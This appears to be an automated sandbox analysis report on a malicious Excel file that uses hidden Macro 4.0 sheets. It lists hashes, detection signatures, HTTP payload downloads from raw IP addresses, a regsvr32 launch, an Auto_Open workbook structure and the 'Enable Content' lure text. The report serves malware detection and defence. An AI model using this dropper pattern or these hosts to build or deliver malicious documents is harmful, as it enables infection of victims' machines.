Analysis Report banUwVSwBY.xlsx

Overview

General Information

Sample Name: banUwVSwBY.xlsx
Analysis ID: 431768
MD5: da5fb469bc9385f16af43843673cadc8
SHA1: 414c25009dd7fad02b87f534779f6863a937aa93
SHA256: 612d8808903469c5840e8697710abe11a2c7e75ccad1e61de969732c42271249
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Obfuscated Macro In XLSM
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 1MB later: 86MB
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 190.14.37.134:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 190.14.37.134:80

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 51.89.115.124 51.89.115.124
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44356.4024921296.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.134Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44356.4024921296.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.115.124Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.134
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.134
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.134
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.134
Source: unknown TCP traffic detected without corresponding DNS query: 37.1.196.25
Source: unknown TCP traffic detected without corresponding DNS query: 37.1.196.25
Source: unknown TCP traffic detected without corresponding DNS query: 37.1.196.25
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.124
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.124
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.124
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.124
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.134
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.124
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.124
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.134
Source: global traffic HTTP traffic detected: GET /44356.4024921296.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.134Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44356.4024921296.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.115.124Connection: Keep-Alive
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.aadrm.com/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.cortana.ai
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.office.net
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.onedrive.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://augloop.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://cdn.entity.
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://clients.config.office.net/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://config.edge.skype.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://cortana.ai
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://cortana.ai/api
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://cr.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://dev.cortana.ai
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://devnull.onenote.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://directory.services.
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://graph.windows.net
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://graph.windows.net/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://lifecycle.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://login.windows.local
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://management.azure.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://management.azure.com/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://messaging.office.com/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://ncus.contentsync.
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://officeapps.live.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://onedrive.live.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://outlook.office.com/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://outlook.office365.com/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://settings.outlook.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://staging.cortana.ai
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://tasks.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://wus2.contentsync.
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.dr String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0 Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1 Screenshot OCR: Enable Content button from the yellow bar above
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{34C063CF-955E-4ACE-9D4C-9A051EAF3AFA}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" state="hidden" r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: classification engine Classification label: mal68.expl.evad.winXLSX@7/10@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{5B99ED4D-368E-46F3-B962-C6561ED05FE5} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
